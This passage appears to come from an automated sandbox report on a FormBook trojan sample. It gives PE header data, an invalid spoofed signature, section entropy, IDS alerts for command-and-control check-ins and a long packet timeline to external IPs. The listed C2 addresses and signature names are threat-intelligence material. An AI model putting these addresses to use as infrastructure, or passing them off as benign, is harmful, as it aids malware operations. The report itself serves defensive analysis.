                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0xEEB2EB9E [Sun Nov 25 17:32:14 2096 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                              Signature Valid:false
                                              Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                              Signature Validation Error:The digital signature of the object did not verify
                                              Error Number:-2146869232
                                              Not Before, Not After
                                              • 12/11/2018 19:00:00 08/11/2021 18:59:59
                                              Subject Chain
                                              • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                              Version:3
                                              Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                              Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                              Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                              Serial:7C1118CBBADC95DA3752C46E47A27438
                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              Name                                  Virtual Address  Virtual Size  Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT          0xac1ca          0x4f          .text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE        0xae000          0x5f8         .rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY        0xaae00          0x3608
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC       0xb0000          0xc           .reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG           0xaa0a4          0x70          .text
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                              IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                              IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                              Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy              Characteristics
                                              .text   0x2000           0xaa224       0xaa400   62b7b6e430d319f902493cd06cdd7c77  False     0.9204194773311307   data       7.915293858213766    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc   0xae000          0x5f8         0x600     28f3957deb2dc9b71aa7236377038542  False     0.4375               data       4.27462971891555     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc  0xb0000          0xc           0x200     d15ac267d03c5d77d0748c8ce79ac41e  False     0.044921875          data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              Name         RVA      Size   Type                                                                              Language  Country  ZLIB Complexity
                                              RT_VERSION   0xae090  0x368  data                                                                                                 0.4208715596330275
                                              RT_MANIFEST  0xae408  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                    0.5489795918367347
                                              DLL          Import
                                              mscoree.dll  _CorExeMain
                                              Timestamp                 Protocol  SID      Message                                      Source Port  Dest Port  Source IP    Dest IP
                                              07/01/24-16:16:13.746309  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  49728        80         192.168.2.5  109.123.121.243
                                              07/01/24-16:16:18.808053  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2   49731        80         192.168.2.5  109.123.121.243
                                              07/01/24-16:18:07.346515  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  49759        80         192.168.2.5  45.207.12.95
                                              07/01/24-16:17:15.863521  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  49744        80         192.168.2.5  203.161.62.199
                                              07/01/24-16:18:21.028651  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  49763        80         192.168.2.5  81.95.96.29
                                              07/01/24-16:17:07.337585  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2   49742        80         192.168.2.5  121.254.178.238
                                              07/01/24-16:17:29.248940  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  49748        80         192.168.2.5  74.208.236.72
                                              07/01/24-16:18:28.632405  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2   49766        80         192.168.2.5  81.95.96.29
                                              07/01/24-16:17:34.312062  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2   49750        80         192.168.2.5  74.208.236.72
                                              07/01/24-16:19:16.252042  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  49779        80         192.168.2.5  31.186.11.254
                                              07/01/24-16:19:02.638028  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  49775        80         192.168.2.5  192.227.175.142
                                              07/01/24-16:19:10.587031  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2   49778        80         192.168.2.5  192.227.175.142
                                              07/01/24-16:16:11.211715  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  49727        80         192.168.2.5  109.123.121.243
                                              07/01/24-16:18:51.373471  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  49772        80         192.168.2.5  72.52.179.174
                                              07/01/24-16:16:24.966593  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  49733        80         192.168.2.5  47.242.109.15
                                              07/01/24-16:19:18.868394  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  49780        80         192.168.2.5  31.186.11.254
                                              07/01/24-16:18:37.901423  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  49768        80         192.168.2.5  103.224.182.246
                                              07/01/24-16:17:02.095932  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  49740        80         192.168.2.5  121.254.178.238
                                              07/01/24-16:17:42.922320  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  49752        80         192.168.2.5  192.207.62.21
                                              07/01/24-16:17:56.643054  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  49756        80         192.168.2.5  199.59.243.226
                                              07/01/24-16:17:13.324881  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  49743        80         192.168.2.5  203.161.62.199
                                              07/01/24-16:15:49.808806  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2   49722        80         192.168.2.5  122.10.13.122
                                              07/01/24-16:18:56.437958  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2   49774        80         192.168.2.5  72.52.179.174
                                              07/01/24-16:18:09.886069  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  49760        80         192.168.2.5  45.207.12.95
                                              07/01/24-16:19:05.500678  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  49776        80         192.168.2.5  192.227.175.142
                                              07/01/24-16:18:01.702274  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2   49758        80         192.168.2.5  199.59.243.226
                                              07/01/24-16:17:54.095976  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  49755        80         192.168.2.5  199.59.243.226
                                              07/01/24-16:18:14.951993  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2   49762        80         192.168.2.5  45.207.12.95
                                              07/01/24-16:17:40.379960  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  49751        80         192.168.2.5  192.207.62.21
                                              07/01/24-16:18:23.559109  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  49764        80         192.168.2.5  81.95.96.29
                                              07/01/24-16:18:48.836010  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  49771        80         192.168.2.5  72.52.179.174
                                              07/01/24-16:16:27.495389  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  49734        80         192.168.2.5  47.242.109.15
                                              07/01/24-16:17:47.997961  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2   49754        80         192.168.2.5  192.207.62.21
                                              07/01/24-16:18:35.366412  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  49767        80         192.168.2.5  103.224.182.246
                                              07/01/24-16:17:26.707967  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  49747        80         192.168.2.5  74.208.236.72
                                              07/01/24-16:17:20.934301  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2   49746        80         192.168.2.5  203.161.62.199
                                              07/01/24-16:18:43.039994  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2   49770        80         192.168.2.5  103.224.182.246
                                              07/01/24-16:16:32.561088  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2   49737        80         192.168.2.5  47.242.109.15
                                              07/01/24-16:16:59.555818  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  49739        80         192.168.2.5  121.254.178.238
                                              Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                              Jul 1, 2024 16:16:30.025892019 CEST4973680192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:30.028462887 CEST4973680192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:30.033482075 CEST804973647.242.109.15192.168.2.5
                                              Jul 1, 2024 16:16:30.035958052 CEST804973647.242.109.15192.168.2.5
                                              Jul 1, 2024 16:16:31.531964064 CEST4973680192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:31.581641912 CEST804973647.242.109.15192.168.2.5
                                              Jul 1, 2024 16:16:32.551876068 CEST4973780192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:32.558434010 CEST804973747.242.109.15192.168.2.5
                                              Jul 1, 2024 16:16:32.558661938 CEST4973780192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:32.561088085 CEST4973780192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:32.565927029 CEST804973747.242.109.15192.168.2.5
                                              Jul 1, 2024 16:16:46.342921972 CEST804973347.242.109.15192.168.2.5
                                              Jul 1, 2024 16:16:46.343034029 CEST4973380192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:48.875663996 CEST804973447.242.109.15192.168.2.5
                                              Jul 1, 2024 16:16:48.875719070 CEST4973480192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:51.408432961 CEST804973647.242.109.15192.168.2.5
                                              Jul 1, 2024 16:16:51.408498049 CEST4973680192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:53.970906973 CEST804973747.242.109.15192.168.2.5
                                              Jul 1, 2024 16:16:53.974265099 CEST4973780192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:53.978355885 CEST4973780192.168.2.547.242.109.15
                                              Jul 1, 2024 16:16:53.983954906 CEST804973747.242.109.15192.168.2.5
                                              Jul 1, 2024 16:16:59.548784018 CEST4973980192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:16:59.553639889 CEST8049739121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:16:59.553709984 CEST4973980192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:16:59.555818081 CEST4973980192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:16:59.561091900 CEST8049739121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:00.505011082 CEST8049739121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:00.505028963 CEST8049739121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:00.505129099 CEST4973980192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:01.063234091 CEST4973980192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:02.083933115 CEST4974080192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:02.090698004 CEST8049740121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:02.092063904 CEST4974080192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:02.095932007 CEST4974080192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:02.100838900 CEST8049740121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:03.025872946 CEST8049740121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:03.025940895 CEST8049740121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:03.026052952 CEST4974080192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:03.610093117 CEST4974080192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:04.630347013 CEST4974180192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:04.636518002 CEST8049741121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:04.638139009 CEST4974180192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:04.641969919 CEST4974180192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:04.646823883 CEST8049741121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:04.646831036 CEST8049741121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:05.573576927 CEST8049741121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:05.573628902 CEST8049741121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:05.573693037 CEST4974180192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:06.143955946 CEST4974180192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:07.162461042 CEST4974280192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:07.334254980 CEST8049742121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:07.334348917 CEST4974280192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:07.337584972 CEST4974280192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:07.342391968 CEST8049742121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:08.265718937 CEST8049742121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:08.265933990 CEST8049742121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:08.266048908 CEST4974280192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:08.269984961 CEST4974280192.168.2.5121.254.178.238
                                              Jul 1, 2024 16:17:08.274780989 CEST8049742121.254.178.238192.168.2.5
                                              Jul 1, 2024 16:17:13.317677975 CEST4974380192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:13.322529078 CEST8049743203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:13.322612047 CEST4974380192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:13.324881077 CEST4974380192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:13.329610109 CEST8049743203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:13.934170961 CEST8049743203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:13.934513092 CEST8049743203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:13.936069965 CEST4974380192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:14.830028057 CEST4974380192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:15.856370926 CEST4974480192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:15.861412048 CEST8049744203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:15.861542940 CEST4974480192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:15.863521099 CEST4974480192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:15.868321896 CEST8049744203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:16.489027023 CEST8049744203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:16.489238977 CEST8049744203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:16.489435911 CEST4974480192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:17.375710011 CEST4974480192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:18.394371986 CEST4974580192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:18.399254084 CEST8049745203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:18.400223970 CEST4974580192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:18.403979063 CEST4974580192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:18.408834934 CEST8049745203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:18.409436941 CEST8049745203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:18.997564077 CEST8049745203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:18.998873949 CEST8049745203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:18.998928070 CEST4974580192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:19.910047054 CEST4974580192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:20.926852942 CEST4974680192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:20.931842089 CEST8049746203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:20.931921005 CEST4974680192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:20.934300900 CEST4974680192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:20.939296007 CEST8049746203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:21.528525114 CEST8049746203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:21.530216932 CEST8049746203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:21.530280113 CEST4974680192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:21.531676054 CEST4974680192.168.2.5203.161.62.199
                                              Jul 1, 2024 16:17:21.537045002 CEST8049746203.161.62.199192.168.2.5
                                              Jul 1, 2024 16:17:26.697139978 CEST4974780192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:26.702999115 CEST804974774.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:26.703108072 CEST4974780192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:26.707967043 CEST4974780192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:26.715126991 CEST804974774.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:27.231482983 CEST804974774.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:27.231802940 CEST804974774.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:27.231853962 CEST4974780192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:28.219439030 CEST4974780192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:29.240709066 CEST4974880192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:29.245527029 CEST804974874.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:29.245604992 CEST4974880192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:29.248939991 CEST4974880192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:29.256118059 CEST804974874.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:29.779887915 CEST804974874.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:29.780077934 CEST804974874.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:29.780158043 CEST4974880192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:30.750695944 CEST4974880192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:31.769987106 CEST4974980192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:31.775090933 CEST804974974.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:31.775161982 CEST4974980192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:31.777240038 CEST4974980192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:31.782124043 CEST804974974.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:31.782246113 CEST804974974.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:32.310808897 CEST804974974.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:32.310872078 CEST804974974.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:32.312638044 CEST4974980192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:33.281980991 CEST4974980192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:34.304009914 CEST4975080192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:34.309771061 CEST804975074.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:34.309971094 CEST4975080192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:34.312062025 CEST4975080192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:34.316946030 CEST804975074.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:34.878957987 CEST804975074.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:34.879153013 CEST804975074.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:34.879384995 CEST4975080192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:34.882210016 CEST4975080192.168.2.574.208.236.72
                                              Jul 1, 2024 16:17:34.887111902 CEST804975074.208.236.72192.168.2.5
                                              Jul 1, 2024 16:17:40.355973959 CEST4975180192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:40.372585058 CEST8049751192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:40.376034021 CEST4975180192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:40.379960060 CEST4975180192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:40.385116100 CEST8049751192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:40.961719990 CEST8049751192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:40.961770058 CEST8049751192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:40.961837053 CEST4975180192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:41.891501904 CEST4975180192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:42.911977053 CEST4975280192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:42.916909933 CEST8049752192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:42.920011044 CEST4975280192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:42.922319889 CEST4975280192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:42.927087069 CEST8049752192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:43.529786110 CEST8049752192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:43.529813051 CEST8049752192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:43.529900074 CEST4975280192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:44.438220978 CEST4975280192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:45.458077908 CEST4975380192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:45.463601112 CEST8049753192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:45.463677883 CEST4975380192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:45.466121912 CEST4975380192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:45.471714020 CEST8049753192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:45.471998930 CEST8049753192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:46.124095917 CEST8049753192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:46.124135017 CEST8049753192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:46.126188040 CEST4975380192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:46.969721079 CEST4975380192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:47.990847111 CEST4975480192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:47.995851994 CEST8049754192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:47.997961044 CEST4975480192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:47.997961044 CEST4975480192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:48.003443003 CEST8049754192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:48.596379042 CEST8049754192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:48.596417904 CEST8049754192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:48.596596003 CEST8049754192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:48.596720934 CEST4975480192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:48.596831083 CEST4975480192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:48.599519014 CEST4975480192.168.2.5192.207.62.21
                                              Jul 1, 2024 16:17:48.604666948 CEST8049754192.207.62.21192.168.2.5
                                              Jul 1, 2024 16:17:54.086344957 CEST4975580192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:54.091176033 CEST8049755199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:54.092051029 CEST4975580192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:54.095976114 CEST4975580192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:54.100742102 CEST8049755199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:54.566551924 CEST8049755199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:54.566566944 CEST8049755199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:54.566576958 CEST8049755199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:54.566713095 CEST4975580192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:55.610253096 CEST4975580192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:56.631984949 CEST4975680192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:56.637126923 CEST8049756199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:56.638112068 CEST4975680192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:56.643054008 CEST4975680192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:56.647942066 CEST8049756199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:57.103627920 CEST8049756199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:57.103652954 CEST8049756199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:57.103703976 CEST4975680192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:57.103719950 CEST8049756199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:57.103765965 CEST4975680192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:58.141344070 CEST4975680192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:59.161892891 CEST4975780192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:59.166946888 CEST8049757199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:59.167028904 CEST4975780192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:59.170070887 CEST4975780192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:59.175156116 CEST8049757199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:59.175291061 CEST8049757199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:59.644108057 CEST8049757199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:59.644196987 CEST8049757199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:59.644232988 CEST8049757199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:17:59.644268036 CEST4975780192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:17:59.644305944 CEST4975780192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:18:00.672576904 CEST4975780192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:18:01.692975044 CEST4975880192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:18:01.699569941 CEST8049758199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:18:01.699639082 CEST4975880192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:18:01.702274084 CEST4975880192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:18:01.709466934 CEST8049758199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:18:02.193284035 CEST8049758199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:18:02.193368912 CEST8049758199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:18:02.193377018 CEST8049758199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:18:02.193986893 CEST4975880192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:18:02.198219061 CEST4975880192.168.2.5199.59.243.226
                                              Jul 1, 2024 16:18:02.203052044 CEST8049758199.59.243.226192.168.2.5
                                              Jul 1, 2024 16:18:07.339035034 CEST4975980192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:07.343945980 CEST804975945.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:07.344031096 CEST4975980192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:07.346514940 CEST4975980192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:07.351342916 CEST804975945.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:08.266159058 CEST804975945.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:08.266400099 CEST804975945.207.12.95192.168.2.5
                                              Jul 1, 2024 16:18:08.266525030 CEST4975980192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:08.860071898 CEST4975980192.168.2.545.207.12.95
                                              Jul 1, 2024 16:18:09.879092932 CEST4976080192.168.2.545.207.12.95
